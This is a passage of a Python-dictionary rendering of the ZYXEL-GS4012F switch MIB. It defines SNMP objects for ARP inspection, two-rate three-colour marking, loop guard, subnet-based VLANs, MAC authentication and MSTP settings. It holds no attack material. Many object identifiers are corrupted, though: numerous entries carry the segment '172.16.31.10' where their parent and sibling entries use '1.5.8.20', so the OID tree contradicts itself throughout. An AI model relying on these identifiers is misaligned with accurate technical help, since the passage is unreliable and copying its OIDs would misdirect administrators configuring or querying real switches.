"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "1",
"max" : "4094"
},
],
"range" : {
"min" : "1",
"max" : "4094"
},
},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectVlanLog" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.102.1.4.1.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"all" : {
"nodetype" : "namednumber",
"number" : "1"
},
"none" : {
"nodetype" : "namednumber",
"number" : "2"
},
"permit" : {
"nodetype" : "namednumber",
"number" : "3"
},
"deny" : {
"nodetype" : "namednumber",
"number" : "4"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"arpInspectVlanStatus" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.1.4.1.3",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"enabled" : {
"nodetype" : "namednumber",
"number" : "1"
},
"disabled" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"arpInspectPortTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.1.5",
"status" : "current",
"description" :
"""""",
}, # table
"arpInspectPortEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.1.5.1",
"status" : "current",
"linkage" : [
"arpInspectPortIndex",
],
"description" :
"""""",
}, # row
"arpInspectPortIndex" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.1.5.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectPortTrust" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.1.5.1.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"trusted" : {
"nodetype" : "namednumber",
"number" : "1"
},
"untrusted" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"arpInspectPortRate" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.1.5.1.3",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "0",
"max" : "2048"
},
],
"range" : {
"min" : "0",
"max" : "2048"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"arpInspectPortInterval" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.1.5.1.4",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "1",
"max" : "15"
},
],
"range" : {
"min" : "1",
"max" : "15"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"arpInspectStatus" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.102.2",
}, # node
"arpInspectFilterClear" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"arpInspectLogClear" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"arpInspectFilterTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.3",
"status" : "current",
"description" :
"""""",
}, # table
"arpInspectFilterEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.3.1",
"create" : "true",
"status" : "current",
"linkage" : [
"arpInspectFilterMac",
"arpInspectFilterVid",
],
"description" :
"""""",
}, # row
"arpInspectFilterMac" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.3.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "MacAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectFilterVid" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.3.1.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "1",
"max" : "4094"
},
],
"range" : {
"min" : "1",
"max" : "4094"
},
},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectFilterPort" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.3.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectFilterExpiry" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.3.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectFilterReason" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.3.1.5",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"macVid" : {
"nodetype" : "namednumber",
"number" : "1"
},
"port" : {
"nodetype" : "namednumber",
"number" : "2"
},
"ip" : {
"nodetype" : "namednumber",
"number" : "3"
},
},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectFilterRowStatus" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.3.1.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "RowStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"arpInspectLogTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.4",
"status" : "current",
"description" :
"""""",
}, # table
"arpInspectLogEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.4.1",
"status" : "current",
"linkage" : [
"arpInspectLogMac",
"arpInspectLogVid",
"arpInspectLogPort",
"arpInspectLogIp",
],
"description" :
"""""",
}, # row
"arpInspectLogMac" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.4.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "MacAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectLogVid" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.4.1.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "1",
"max" : "4094"
},
],
"range" : {
"min" : "1",
"max" : "4094"
},
},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectLogPort" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.4.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectLogIp" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.4.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectLogNumPkt" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.4.1.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectLogTime" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.4.1.7",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "DateAndTime"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectStatisticsTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.5",
"status" : "current",
"description" :
"""""",
}, # table
"arpInspectStatisticsEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.5.1",
"status" : "current",
"linkage" : [
"arpInspectStatisticsVid",
],
"description" :
"""""",
}, # row
"arpInspectStatisticsVid" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.5.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectStatisticsReceived" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.5.1.2",
"status" : "current",
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectStatisticsRequest" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.5.1.3",
"status" : "current",
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectStatisticsReply" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.5.1.4",
"status" : "current",
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectStatisticsForward" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.5.1.5",
"status" : "current",
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectStatisticsDrop" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.5.1.6",
"status" : "current",
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectStatisticsClear" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.5.1.7",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"trTCMSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.103",
}, # node
"trTCMState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.103.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""Two-rate three color marker enabled/disabled for the switch.""",
}, # scalar
"trTCMMode" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.103.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"color-aware" : {
"nodetype" : "namednumber",
"number" : "0"
},
"color-blind" : {
"nodetype" : "namednumber",
"number" : "1"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"trTCMPortTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.103.3",
"status" : "current",
"description" :
"""""",
}, # table
"trTCMPortEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.103.3.1",
"create" : "true",
"status" : "current",
"linkage" : [
"dot1dBasePort",
],
"description" :
"""An entry in trTCMPortTable.""",
}, # row
"trTCMPortState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.103.3.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "RowStatus"},
},
"access" : "readwrite",
"description" :
"""Two-rate three color marker enabled/disabled on the port.""",
}, # column
"trTCMPortCIR" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.103.3.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""Allowed CIR in pkts/s.""",
}, # column
"trTCMPortPIR" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.103.3.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""Allowed PIR in pkts/s.""",
}, # column
"trTCMPortDscpGreen" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.103.3.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""0-63""",
}, # column
"trTCMPortDscpYellow" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.103.3.1.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""0-63""",
}, # column
"trTCMPortDscpRed" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.103.3.1.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""0-63""",
}, # column
"loopGuardSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.104",
}, # node
"loopGuardState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.104.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"loopGuardPortTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.104.2",
"status" : "current",
"description" :
"""""",
}, # table
"loopGuardPortEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.104.2.1",
"status" : "current",
"linkage" : [
"dot1dBasePort",
],
"description" :
"""An entry in loopGuardPortTable.""",
}, # row
"loopGuardPortState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.104.2.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"subnetBasedVlanSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.105",
}, # node
"subnetBasedVlanState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.105.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""subnet-based vlan feature enabled/disabled for the switch.""",
}, # scalar
"dhcpVlanOverrideState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.105.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""dhcp vlan override enabled/disabled when subnet-based vlan is enabled.""",
}, # scalar
"subnetBasedVlanTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.105.3",
"status" : "current",
"description" :
"""""",
}, # table
"subnetBasedVlanEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.105.3.1",
"create" : "true",
"status" : "current",
"linkage" : [
"subnetBasedVlanSrcIp",
"subnetBasedVlanSrcMaskBit",
],
"description" :
"""An entry in subnetBasedVlanTable.""",
}, # row
"subnetBasedVlanSrcIp" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.105.3.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readonly",
"description" :
"""source ip for subnet-based vlan entry""",
}, # column
"subnetBasedVlanSrcMaskBit" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.105.3.1.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "1",
"max" : "32"
},
],
"range" : {
"min" : "1",
"max" : "32"
},
},
},
"access" : "readonly",
"description" :
"""source ip mask-bits for subnet-based vlan entry""",
}, # column
"subnetBasedVlanName" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.105.3.1.3",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "OctetString",
"parent module" : {
"name" : "RFC1213-MIB",
"type" : "DisplayString",
},
"ranges" : [
{
"min" : "0",
"max" : "31"
},
],
"range" : {
"min" : "0",
"max" : "31"
},
},
},
"access" : "readwrite",
"description" :
"""name for subnet-based vlan entry""",
}, # column
"subnetBasedVlanVid" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.105.3.1.4",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "1",
"max" : "4094"
},
],
"range" : {
"min" : "1",
"max" : "4094"
},
},
},
"access" : "readwrite",
"description" :
"""vid for subnet-based vlan entry""",
}, # column
"subnetBasedVlanPriority" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.105.3.1.5",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "0",
"max" : "7"
},
],
"range" : {
"min" : "0",
"max" : "7"
},
},
},
"access" : "readwrite",
"description" :
"""priority for subnet-based vlan entry""",
}, # column
"subnetBasedVlanEntryState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.105.3.1.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "RowStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"macAuthenticationSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.106",
}, # node
"macAuthenticationState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.106.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"macAuthenticationNamePrefix" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.106.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"macAuthenticationPassword" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.106.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"macAuthenticationTimeout" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.106.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"macAuthenticationPortTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.106.5",
"status" : "current",
"description" :
"""""",
}, # table
"macAuthenticationPortEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.106.5.1",
"status" : "current",
"linkage" : [
"dot1dBasePort",
],
"description" :
"""An entry in macAuthenticationPortTable.""",
}, # row
"macAuthenticationPortState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.106.5.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"mstp" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107",
}, # node
"mstpGen" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.1",
}, # node
"mstpGenState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""Enabled/disabled on the mrstp bridge.""",
}, # scalar
"mstpGenCfgIdName" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readwrite",
"description" :
"""The configuration name that identifies the MST
region and is used as one of the inputs in the
computation of the MST Configuration Identifier.""",
"reference>" :
"""12.12.3.4.2.b)""",
}, # scalar
"mstpGenCfgIdRevLevel" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""This object identifies the MST revision that
identifies the MST region and is used as one
of the inputs in the computation of the MST
configuration Identifier.""",
"reference>" :
"""12.12.3.4.2.c)""",
}, # scalar
"mstpGenCfgIdCfgDigest" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.1.4",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "OctetString",
"ranges" : [
{
"min" : "16",
"max" : "16"
},
],
"range" : {
"min" : "16",
"max" : "16"
},
},
},
"access" : "readonly",
"description" :
"""Configuration Digest.""",
"reference>" :
"""12.12.3.3.3.a.4""",
}, # scalar
"mstpGenHelloTime" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.1.5",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"parent module" : {
"name" : "BRIDGE-MIB",
"type" : "Timeout",
},
"ranges" : [
{
"min" : "1",
"max" : "10"
},
],
"range" : {
"min" : "1",
"max" : "10"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"mstpGenMaxAge" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.1.6",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"parent module" : {
"name" : "BRIDGE-MIB",
"type" : "Timeout",
},
"ranges" : [
{
"min" : "6",
"max" : "40"
},
],
"range" : {
"min" : "6",
"max" : "40"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"mstpGenForwardDelay" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.1.7",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"parent module" : {
"name" : "BRIDGE-MIB",
"type" : "Timeout",
},
"ranges" : [
{
"min" : "4",
"max" : "30"
},
],
"range" : {
"min" : "4",
"max" : "30"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"mstpGenMaxHops" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.1.8",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "4",
"max" : "30"
},
],
"range" : {
"min" : "4",
"max" : "30"
},
},
},
"access" : "readwrite",
"description" :
"""13.22.f)""",
}, # scalar
"mstpGenCistRootPathCost" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.1.9",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
""".""",
}, # scalar
"mstpGenCistRootBrid" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.1.10",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "OctetString",
"ranges" : [
{
"min" : "32",
"max" : "32"
},
],
"range" : {
"min" : "32",
"max" : "32"
},
},
},
"access" : "readonly",
"description" :
""".""",
}, # scalar
"mstMapTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.20",
"status" : "current",
"description" :
"""This table contains one entry for each instance of MSTP.""",
}, # table
"mstMapEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.20.1",
"create" : "true",
"status" : "current",
"linkage" : [
"mstMapIndex",
],
"description" :
"""A conceptual row containing the status of the MSTP instance.""",
}, # row
"mstMapIndex" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.20.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"ZYXEL-GS4012F-MIB", "name" : "MstiOrCistInstanceIndex"},
},
"access" : "noaccess",
"description" :
"""Uniquely identifies an instance. The entry of this table with index 0
presents always, represents CIST. When SET operation """,
}, # column
"mstMapVlans1k" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.20.1.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "OctetString",
"ranges" : [
{
"min" : "0",
"max" : "128"
},
],
"range" : {
"min" : "0",
"max" : "128"
},
},
},
"access" : "readwrite",
"description" :
"""A string of octets containing one bit per VLAN. The
first octet corresponds to VLANs with VlanIndex values
1 through 8; the second octet to VLANs 9 through
16 etc. The most significant bit of each octet
corresponds to the lowest VlanIndex value in that octet.
For each VLAN that is mapped to this MSTP instance,
the bit corresponding to that VLAN is set to '1'.
Empty (zero) most significant octes are not mandatory.""",
}, # column
"mstMapVlans2k" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
